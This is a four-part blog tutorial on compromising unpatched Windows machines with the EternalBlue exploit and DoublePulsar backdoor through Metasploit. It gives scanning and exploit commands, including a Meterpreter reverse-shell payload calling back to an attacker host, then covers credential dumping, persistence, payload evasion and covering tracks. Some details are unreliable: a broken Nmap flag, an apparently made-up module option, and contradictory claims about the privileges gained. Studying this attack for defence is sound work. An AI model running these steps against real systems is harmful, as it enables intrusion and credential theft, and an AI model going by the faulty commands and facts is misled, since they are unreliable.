A Step-by-Step Guide to Windows Hacking with EternalBlue-DoublePulsar in Metasploit

In the realm of cybersecurity, certain vulnerabilities and exploits have become legendary due to their effectiveness and the scale of impact they have caused. Among these, the EternalBlue exploit, paired with the DoublePulsar backdoor, stands out as a game-changer in the history of Windows system compromises. Understanding these tools is essential for penetration testers, ethical hackers, and security professionals seeking to grasp how attackers can gain access to Windows environments and how to protect against such threats.

EternalBlue exploits a critical vulnerability in Microsoft’s Server Message Block (SMB) protocol, specifically version 1 (SMBv1). SMB is a network file sharing protocol widely used for sharing files, printers, and serial ports between computers on a network. The vulnerability exploited by EternalBlue is officially tracked as CVE-2017-0144, a remote code execution flaw that allows an attacker to send specially crafted packets to a Windows machine’s SMB service and gain arbitrary code execution privileges.

This exploit was leaked in April 2017 by a hacking group known as the Shadow Brokers, who claimed to have stolen the exploit from the United States National Security Agency (NSA). Shortly thereafter, EternalBlue was used in several devastating cyberattacks, most notably the WannaCry ransomware attack that spread rapidly around the globe, infecting hundreds of thousands of computers in over 150 countries within days. The widespread success of the exploit was largely due to the prevalence of unpatched Windows systems still running SMBv1, often on Windows 7, Windows Server 2008, and earlier versions.

What makes EternalBlue particularly dangerous is its ability to execute code remotely without any user interaction. The attacker simply needs network access to the SMB service on the victim machine, typically listening on TCP port 445. Once exploited, this vulnerability gives the attacker the ability to execute arbitrary commands with SYSTEM-level privileges, effectively granting full control over the compromised computer.

However, EternalBlue alone is often not enough to maintain long-term control over a system. This is where DoublePulsar comes into play. DoublePulsar is a kernel-mode backdoor implant that acts as a payload deployed after successful exploitation with EternalBlue. It was also leaked by the Shadow Brokers and is designed to be a lightweight, stealthy tool that allows attackers to load and execute additional malware or commands on the compromised system without triggering immediate suspicion.

DoublePulsar operates by injecting itself into the Windows kernel, where it intercepts incoming SMB packets and waits for specific commands from the attacker. This backdoor is capable of injecting shellcode, loading DLLs, or executing commands remotely, providing persistent access even if the initial exploitation attempt ends or the Meterpreter session is closed. In essence, DoublePulsar functions as a foothold for attackers, enabling them to maintain control, escalate privileges, and move laterally within the network.

The combination of EternalBlue and DoublePulsar has become a common vector for ransomware campaigns, data theft, and advanced persistent threats. This has led security professionals to prioritize patching SMB vulnerabilities, disabling SMBv1 where possible, and implementing network segmentation and intrusion detection systems.

For penetration testers, leveraging these exploits in a controlled environment offers valuable insights into the severity of vulnerabilities and the possible consequences of an unpatched system. The Metasploit framework, a widely-used open-source tool for penetration testing, provides dedicated modules for EternalBlue and DoublePulsar, simplifying the exploitation process and automating many steps that would otherwise require manual crafting of packets and shellcode.

Before diving into the exploitation itself, it is crucial to understand the necessary reconnaissance and preparatory steps. Identifying vulnerable systems typically involves scanning networks for open SMB ports and probing for version information. Nmap, a popular network scanning tool, offers scripts that can detect SMB versions and check for the EternalBlue vulnerability. Knowing the target’s Windows version and patch status allows testers to confirm if the system is susceptible to MS17-010, the Microsoft security bulletin that addresses the EternalBlue flaw.

Once a vulnerable target is confirmed, setting up the Metasploit framework to use the EternalBlue exploit module involves configuring parameters such as the target’s IP address, payload type, and options related to the backdoor deployment. Metasploit’s automation not only expedites the process but also provides capabilities for establishing reverse shells and interactive Meterpreter sessions, facilitating post-exploitation activities.

Ethics and legal compliance are fundamental considerations when working with these powerful exploits. Unauthorized exploitation of systems is illegal and can cause significant harm. All penetration testing activities involving EternalBlue and DoublePulsar must be performed in authorized environments or labs with explicit permission from system owners. Such responsible use helps organizations identify and remediate vulnerabilities before malicious actors can exploit them.

Understanding the interplay between EternalBlue and DoublePulsar is also vital in developing effective defense strategies. Network administrators are advised to disable SMBv1 completely and ensure all Windows systems are updated with patches provided by Microsoft since March 2017. Firewalls should block unsolicited SMB traffic from untrusted networks, and endpoint security solutions should be configured to detect unusual SMB activity or kernel-mode implants.

Another key defense is network segmentation, which limits the ability of malware or attackers to spread from one compromised machine to others on the network. Intrusion detection and prevention systems (IDS/IPS) can be tuned to alert administrators to suspicious SMB traffic or repeated exploit attempts.

For those working in cybersecurity education and research, replicating EternalBlue and DoublePulsar exploits in a virtual lab environment is an invaluable way to understand their mechanisms, test detection tools, and evaluate security posture. Setting up such labs requires vulnerable Windows virtual machines, a Metasploit-enabled attacker machine, and proper network isolation to prevent accidental spread.

EternalBlue exploits a critical flaw in SMBv1 to allow remote code execution on Windows systems, while DoublePulsar acts as a stealthy backdoor implant providing persistent access after exploitation. Together, they represent a formidable threat used by attackers worldwide. Metasploit’s modules enable ethical hackers and penetration testers to simulate these attacks in safe environments, highlighting the importance of timely patching, network hardening, and vigilant monitoring.

The next part in this series will focus on the practical setup of a lab environment for exploiting Windows machines using EternalBlue and DoublePulsar via Metasploit. This will include guidance on configuring vulnerable targets, preparing the attacker system, and ensuring safe testing conditions.

Setting Up the Lab Environment for Exploiting Windows with EternalBlue and DoublePulsar Using Metasploit

Creating a controlled lab environment is a crucial step for anyone looking to explore the EternalBlue and DoublePulsar exploits safely and effectively. This environment allows penetration testers, security researchers, and ethical hackers to understand the vulnerabilities and test their defenses without risking real-world systems. In this part, we will walk through the hardware and software requirements, installation steps, and network configuration necessary to prepare a Windows hacking lab using Metasploit.

Hardware and Software Requirements

Before diving into the setup, it’s essential to have the right hardware and software components. A standard modern computer with at least 8 GB of RAM and a multi-core processor is recommended, as virtualization can be resource-intensive. For more demanding setups, especially when running multiple virtual machines simultaneously, 16 GB or more of RAM and SSD storage improve performance significantly.

On the software side, the primary components include:

  • A virtualization platform such as VMware Workstation, Oracle VirtualBox, or Hyper-V.

  • A Windows virtual machine is vulnerable to EternalBlue and DoublePulsar exploits. Windows 7 (unpatched), Windows Server 2008, or Windows Server 2012 systems are common choices because they still have SMBv1 enabled by default in older builds.

  • An attacker machine running Kali Linux or any other Linux distribution with Metasploit installed. Kali Linux is popular because it comes pre-installed with Metasploit and many penetration testing tools.

  • Additional utilities like Nmap for network scanning and Wireshark for packet analysis enhance the testing experience, but are optional.

Downloading and Installing Virtual Machines

To begin, download an ISO image or pre-built virtual appliance of the vulnerable Windows system. Microsoft offers evaluation copies of Windows Server and Windows 7 that can be legally used for testing purposes. For the attacker machine, Kali Linux can be downloaded from its official website as an ISO or pre-configured virtual machine.

Once downloaded, use your virtualization software to create new virtual machines. Assign enough RAM (at least 2 GB for Windows VMs and 4 GB for Kali Linux) and allocate sufficient disk space (20 GB or more). For network settings, use a host-only or NAT network to isolate the lab from the physical network and the internet to avoid accidental spreading of exploits.

After installation, it is vital to disable automatic Windows updates on the vulnerable machine. This ensures that the system remains unpatched and susceptible to the EternalBlue vulnerability. Confirm that SMBv1 is enabled, as recent Windows versions may have it disabled by default due to security concerns. Enabling SMBv1 manually can be done through Windows Features or PowerShell commands.

Network Configuration for Safe Testing

Proper network configuration ensures your lab environment is safe and isolated. Use the virtualization platform’s options to create a private network that allows communication only between your attacker and target machines. This prevents any accidental interactions with other devices on your physical network or the internet.

If your virtualization software supports it, configure static IP addresses on both the Windows target and Kali Linux attacker machines. This makes targeting and scanning simpler during the exploitation phase. For example, assign the Windows VM an IP like 192.168.56.101 and Kali Linux 192.168.56.100 on the same subnet.

Testing connectivity is straightforward by pinging the Windows VM from Kali Linux. Ensuring proper network reachability between the machines is the foundation for the next steps in scanning and exploitation.

Preparing the Windows Target for Exploitation

Once your Windows VM is up and networked, verify that the SMB service is active and listening on port 445. This can be checked using the netstat command on the Windows system or by using Nmap from the Kali Linux machine.

Next, confirm the target’s vulnerability to EternalBlue. On Kali Linux, run the following Nmap command with the SMB vulnerability script:

css

CopyEdit

nmap -p 445– script smb-vuln-ms17-010 192.168.56.101

 

If the system is vulnerable, the output will confirm the presence of the MS17-010 flaw, indicating EternalBlue can be exploited. This check helps avoid wasted attempts on patched systems.

To ensure smooth exploitation, disable any third-party firewalls or antivirus software on the Windows VM, as they may block or detect the payloads used by DoublePulsar and Metasploit. Since this is a controlled lab, disabling these protections poses no risk but enhances success rates.

Setting Up Metasploit on Kali Linux

Metasploit is an advanced penetration testing framework that automates many exploitation tasks, including EternalBlue and DoublePulsar payload delivery. Kali Linux usually comes with Metasploit pre-installed, but it’s essential to update its database and modules regularly.

Start by opening a terminal and running:

csharp

CopyEdit

sudo msfdb init

sudo msfconsole

 

Within the Metasploit console, update the framework to ensure you have the latest exploit modules:

nginx

CopyEdit

msf > msfupdate

 

This step ensures your EternalBlue and DoublePulsar modules contain recent patches and improvements.

Using the EternalBlue Module in Metasploit

The EternalBlue module in Metasploit is located under exploit/windows/smb/ms17_010_eternalblue. To load it, type:

bash

CopyEdit

msf > use exploit/windows/smb/ms17_010_eternalblue

 

Once loaded, set the target IP address using the set RHOSTS command:

nginx

CopyEdit

msf > set RHOSTS 192.168.56.101

 

Next, select the appropriate payload. Meterpreter reverse TCP shells are common choices as they allow interactive sessions:

bash

CopyEdit

msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp

msf > set LHOST 192.168.56.100

msf > set LPORT 4444

 

LHOST should be the Kali Linux IP address to receive the connection from the target.

Verify all settings with the show options command before launching the exploit.

Launching the Exploit and Handling Sessions

To start exploitation, type:

nginx

CopyEdit

msf > exploit

 

Metasploit will attempt to send the crafted SMB packets to the target machine. If successful, you will receive a Meterpreter session, granting control over the compromised Windows system.

Once a session is established, you can interact with the target via commands such as sysinfo, getuid, and shell. This access demonstrates how an attacker can fully control an unpatched Windows system via EternalBlue and DoublePulsar.

Deploying DoublePulsar for Persistent Access

Metasploit also includes functionality to deploy the DoublePulsar backdoor automatically during exploitation. This implant maintains access even if the initial Meterpreter session ends.

When running the EternalBlue module, setting the option ENABLE_DOUBLEPULSAR to true will trigger the backdoor installation:

arduino

CopyEdit

msf > set ENABLE_DOUBLEPULSAR true

 

DoublePulsar’s kernel-mode implant listens for commands from the attacker, allowing stealthy code execution and further malware deployment.

Post-Exploitation and Cleanup

After exploitation, performing post-exploitation activities such as gathering system information, dumping credentials, or escalating privileges illustrates the full potential of the EternalBlue-DoublePulsar attack chain.

However, always remember to clean up after testing to avoid leaving vulnerable backdoors on your lab machines. Use Meterpreter commands like exit to close sessions and revert any changes made for testing purposes.

Building a lab environment with vulnerable Windows VMs and a Kali Linux attacker machine is essential for understanding the practical aspects of exploiting EternalBlue and DoublePulsar with Metasploit. Proper hardware, careful network setup, and system preparation enable safe, controlled exploitation that teaches vital lessons in Windows hacking and defense.

The following part of this series will explore in-depth how to execute the EternalBlue exploit using Metasploit, handle sessions, and maximize payload effectiveness for real-world simulation.

Executing the EternalBlue Exploit and Leveraging DoublePulsar with Metasploit

With your lab environment ready and Metasploit set up, this part focuses on the actual exploitation process using EternalBlue, followed by deploying the DoublePulsar backdoor. We will also discuss session handling, common obstacles during exploitation, and best practices to maximize the success of your attack simulation.

Understanding the Exploit Workflow

The EternalBlue exploit targets a vulnerability in the Windows Server Message Block (SMB) protocol, specifically SMBv1, allowing remote code execution without authentication. When successfully exploited, it grants an attacker the ability to run arbitrary code on the target machine.

DoublePulsar, a kernel-mode backdoor implant delivered by EternalBlue, ensures persistent access to the compromised system. It allows subsequent commands and payloads to be executed stealthily.

This combination of EternalBlue and DoublePulsar makes the exploit chain highly effective in real-world attacks, as demonstrated by the widespread WannaCry and NotPetya ransomware outbreaks.

Launching EternalBlue Exploit in Metasploit

After configuring the EternalBlue module and payload settings as described previously, it’s time to run the exploit:

nginx

CopyEdit

msf > exploit

 

Metasploit will initiate the attack by sending specially crafted SMB packets to the target. During this phase, the framework attempts to trigger the buffer overflow vulnerability in SMBv1 and deliver the payload.

If successful, Metasploit will display a message indicating that the session was opened and will drop you into a Meterpreter shell.

Troubleshooting Exploit Failures

Exploitation attempts may fail due to several reasons:

  • The target system is patched against MS17-010.

  • SMBv1 is disabled on the target.

  • Network connectivity issues or firewalls blocking the SMB port 445.

  • Anti-virus or endpoint protection software detects and blocks payloads.

To troubleshoot, first verify that the target is vulnerable using Nmap’s smb-vuln-ms17-010 script. If the vulnerability is confirmed but exploitation fails, try disabling Windows Firewall and antivirus on the VM.

If network issues are suspected, use tools like Wireshark to capture and analyze SMB traffic during the attack attempt. This can reveal dropped or malformed packets.

Additionally, adjusting payload options or switching to a different payload type may help bypass detection.

Establishing and Interacting with Meterpreter Sessions

Once a Meterpreter session is obtained, it represents a powerful foothold on the compromised Windows system. You can interact with the session by typing:

css

CopyEdit

msf > sessions -i [session_id]

 

Common Meterpreter commands include:

  • sysinfo: Displays operating system and hardware details.

  • getuid: Shows the user context of the session.

  • hashdump: Extracts password hashes from the target (requires administrative privileges).

  • Shell: Opens a command shell on the target machine.

  • P.S.: Lists running processes.

  • Migrate: Moves the Meterpreter payload to another process to maintain persistence.

These capabilities illustrate the level of control achievable through the EternalBlue exploit, demonstrating why it was so devastating.

Deploying DoublePulsar for Persistent Access

If you set the module option to enable DoublePulsar backdoor deployment, Metasploit attempts to implant this kernel-level rootkit immediately after exploitation.

DoublePulsar enables stealthy command and control, allowing the attacker to inject DLLs, execute shellcode, or maintain long-term access even after reboot.

You can verify DoublePulsar’s presence by scanning the target with dedicated detection scripts or Metasploit auxiliary modules designed for backdoor enumeration.

Using DoublePulsar for Post-Exploitation

DoublePulsar acts as a conduit for executing various post-exploitation tasks without relying on active sessions. For example, attackers can:

  • Upload additional malware or ransomware.

  • Extract sensitive data from the system.

  • Modify system files or registry keys for persistence.

  • Disable security software silently.

Within Metasploit, payloads can be delivered through DoublePulsar commands, making it a versatile tool in the attacker’s arsenal.

Advanced Payload Options

While the default Meterpreter reverse TCP payload works well, there are alternative payloads and delivery methods to evade detection:

  • Meterpreter over HTTP/HTTPS: Uses web protocols to blend in with normal traffic.

  • Staged vs. Stageless Payloads: Staged payloads are smaller but require multiple steps, while stageless payloads are larger but execute immediately.

  • Custom Encoders and Obfuscation: Alter the payload to avoid signature-based detection.

Selecting the right payload depends on the target environment, security controls, and objectives.

Maintaining Operational Security (OpSec)

When simulating these attacks, even in a lab, practicing OpSec is critical. Avoid accidental exposure of exploits or payloads to production networks.

Always isolate your virtual environment, use network segmentation, and monitor traffic carefully. Additionally, document your steps to understand and improve your methodologies.

Post-Exploitation Cleanup and System Hardening

After your tests, clean up to restore the Windows VM to a safe state. Remove backdoors, close active sessions, and revert any system changes made during exploitation.

This practice helps avoid accidental re-exploitation and prepares your lab for subsequent tests.

Moreover, learning how to detect and defend against EternalBlue and DoublePulsar is vital for cybersecurity professionals. Applying the latest patches, disabling SMBv1, and monitoring SMB traffic are key defense strategies.

In this part, you learned how to launch the EternalBlue exploit using Metasploit, handle Meterpreter sessions, and leverage the DoublePulsar backdoor implant for persistent access. Understanding these processes is essential for replicating real-world attacks and testing defenses.

The final part of this series will focus on advanced post-exploitation techniques, including privilege escalation, credential harvesting, and persistence mechanisms to simulate a full attack lifecycle.

Advanced Post-Exploitation Techniques and Defense Strategies after EternalBlue-DoublePulsar Compromise

After successfully exploiting a Windows system with EternalBlue and deploying the DoublePulsar backdoor, the attacker’s work has only begun. This phase, known as post-exploitation, involves expanding control, extracting valuable information, maintaining persistence, and covering tracks. For security professionals, understanding these techniques is crucial for threat hunting and mitigation. In this final part, we will explore advanced post-exploitation actions, methods to escalate privileges, gather credentials, establish long-term access, and implement defensive measures.

Expanding Control through Privilege Escalation

Initial access through EternalBlue typically provides limited privileges, often as the local system or a service account. However, to fully control the system or move laterally within a network, privilege escalation is necessary.

Common approaches to escalating privileges include:

  • Exploiting Vulnerable Services or Drivers: Many Windows versions have known local privilege escalation vulnerabilities in services or device drivers. Tools like Metasploit’s getsystem command or external scripts automate these exploits.

  • Token Impersonation: Meterpreter can impersonate tokens from higher-privilege processes, elevating the session’s rights.

  • Bypassing User Account Control (UAC): Various techniques exist to circumvent UAC prompts, allowing administrative execution without user interaction.

Successfully escalating privileges enables the attacker to perform sensitive actions such as dumping credentials, disabling security software, or modifying system configurations.

Credential Harvesting Techniques

Once privileged access is obtained, attackers focus on gathering credentials to move laterally and maintain access. Techniques include:

  • Dumping Password Hashes: Tools like hashdump in Meterpreter extract NTLM hashes stored on the system. These can be cracked offline or used in pass-the-hash attacks.

  • Accessing the Security Account Manager (SAM) Database: The SAM stores user account information and password hashes. Accessing and dumping SAM requires elevated privileges.

  • Extracting Credentials from Memory: Tools like Mimikatz (which can be run through Meterpreter) extract plaintext passwords, Kerberos tickets, and cached credentials from system memory.

  • Searching for Stored Passwords: Attackers look for plaintext passwords stored in files, scripts, or browsers.

Harvesting credentials allows attackers to compromise additional systems and expand their foothold within the network.

Establishing Persistence Mechanisms

To maintain access even after system reboots or network interruptions, attackers employ persistence techniques:

  • Installing Scheduled Tasks or Services: Creating tasks that run malicious payloads at startup or specific intervals.

  • Modifying Registry Keys: Adding entries to Windows Registry run keys or startup folders to launch malware on boot.

  • DLL Injection and Hooking: Injecting malicious DLLs into trusted processes to maintain stealthy control.

  • Using DoublePulsar’s Backdoor: As a kernel-level implant, DoublePulsar can remain active between reboots, providing covert access.

Persistence mechanisms ensure the attacker can reconnect to compromised systems at will, complicating remediation efforts.

Covering Tracks and Evading Detection

Sophisticated attackers attempt to erase evidence of their presence to avoid detection by security teams and forensic analysts:

  • Clearing Logs: Deleting or manipulating Windows event logs and security logs.

  • Disabling Security Software: Stopping or modifying antivirus, endpoint detection, and intrusion detection systems.

  • Using Fileless Malware Techniques: Running payloads entirely in memory without writing files to disk.

  • Timestamp Manipulation: Changing file timestamps to blend malicious files with legitimate system files.

Awareness of these tactics helps defenders implement better monitoring and response strategies.

Defensive Measures and Mitigation Strategies

Understanding how EternalBlue and DoublePulsar attacks unfold aids in building effective defenses:

  • Patch Management: Applying Microsoft’s MS17-010 patch and subsequent updates is the most critical step to prevent exploitation.

  • Disabling SMBv1: Since EternalBlue exploits SMBv1, disabling this outdated protocol reduces the attack surface.

  • Network Segmentation: Isolating critical systems and restricting SMB traffic through firewalls limits lateral movement.

  • Intrusion Detection Systems (IDS) and Network Monitoring: Tools can detect suspicious SMB traffic and known exploit signatures.

  • Endpoint Protection: Modern antivirus and EDR solutions can detect and block DoublePulsar implants and Meterpreter payloads.

  • Regular Auditing and Incident Response: Frequent log reviews, vulnerability scans, and well-defined response plans reduce dwell time.

By combining technical controls with security awareness, organizations can harden their environments against these attacks.

This four-part series provided a comprehensive walkthrough of exploiting Windows systems using the EternalBlue and DoublePulsar vulnerabilities with Metasploit. From setting up a lab environment to executing the exploit, handling payloads, and performing advanced post-exploitation, the knowledge gained empowers security professionals to understand both offensive and defensive aspects of these critical vulnerabilities.

The EternalBlue-DoublePulsar exploit chain remains a powerful example of how unpatched systems can be compromised quickly and stealthily. Continual learning, proactive patching, and layered security defenses are essential to mitigate risks posed by similar exploits.

Final Thoughts

The EternalBlue and DoublePulsar exploit duo represents one of the most significant and impactful vulnerabilities in recent cybersecurity history. Its ability to remotely execute code on unpatched Windows systems and maintain stealthy, persistent access has been exploited by major malware campaigns, causing widespread disruption worldwide.

Through this series, you have gained insight into the full lifecycle of such an attack—from preparing your environment and identifying vulnerable systems to executing the exploit, managing access with Meterpreter sessions, and conducting advanced post-exploitation tasks like privilege escalation and credential harvesting. This deep understanding is crucial not only for offensive security practitioners who test and harden defenses but also for defenders who must recognize, respond to, and mitigate these threats.

The key takeaway is the importance of maintaining robust patch management practices, disabling legacy protocols like SMBv1, and implementing strong network segmentation and monitoring. Combining technical controls with ongoing awareness and incident response readiness helps protect organizations against exploits of this nature.

As attackers continually evolve, studying these vulnerabilities and exploitation techniques prepares cybersecurity professionals to stay one step ahead. Remember, responsible use of these tools and techniques in controlled environments aids learning and defense, while unauthorized use is illegal and unethical.

Continuing to build skills in penetration testing, threat hunting, and digital forensics will enable you to better protect systems and data from evolving threats. Always approach cybersecurity with a mindset focused on learning, defense, and ethical responsibility.

 

Related posts:

  1. Windows 10 Ceases to Exist…Why?
  2. What Does Ethical Hacking Mean?
  3. Self-Taught Ethical Hacking: Is It Possible and How to Start?
  4. The Ultimate Guide to the Best Phones for Mobile Hacking and Security Research
  5. Windows Security Auditing Demystified: Pro Techniques for Maximum Protection
  6. Regaining Access: Restoring GRUB After Windows Overwrites It
  7. Comprehensive Guide to Best Practices in Windows Security Auditing
  8. 3 Surprising Facts About Application Security You Didn’t Know”
  9. The Mechanics of UDP Ping: A Comprehensive Guide
  10. Decoding FIPS 199: A Framework for Categorizing Federal Information Security
img